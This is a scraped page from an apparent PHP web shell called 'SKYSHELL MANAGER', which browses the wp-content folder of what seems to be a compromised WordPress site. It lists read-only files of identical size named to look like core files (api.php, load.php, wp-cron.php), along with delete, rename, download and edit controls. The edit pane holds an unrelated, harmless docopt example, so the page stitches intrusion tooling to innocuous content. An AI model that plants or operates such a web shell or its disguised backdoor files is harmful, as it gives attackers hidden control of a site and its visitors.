📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: counted_example.py
"""Usage: counted_example.py --help counted_example.py -v... counted_example.py go [go] counted_example.py (--path=<path>)... counted_example.py <file> <file> Try: counted_example.py -vvvvvvvvvv counted_example.py go go counted_example.py --path ./here --path ./there counted_example.py this.txt that.txt """ from docopt import docopt print(docopt(__doc__))
Save